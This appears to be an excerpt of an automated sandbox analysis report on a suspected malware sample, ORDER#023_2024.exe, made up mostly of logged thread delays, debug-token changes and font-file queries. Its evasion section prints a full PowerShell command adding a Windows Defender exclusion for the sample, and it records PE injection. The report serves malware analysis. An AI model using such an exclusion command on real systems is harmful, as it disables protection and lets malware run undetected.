                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 95235Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 95110Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 94985Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 94860Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 94735Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 94610Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 94485Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 94360Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 94235Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 94110Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 93985Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 93860Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 93735Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 93610Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeThread delayed: delay time: 93485Jump to behavior
                        Source: ORDER#023_2024.exe, 00000005.00000002.2903870368.00000000012C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBRr
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"Jump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeMemory written: C:\Users\user\Desktop\ORDER#023_2024.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDER#023_2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeProcess created: C:\Users\user\Desktop\ORDER#023_2024.exe "C:\Users\user\Desktop\ORDER#023_2024.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Users\user\Desktop\ORDER#023_2024.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ORDER#023_2024.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
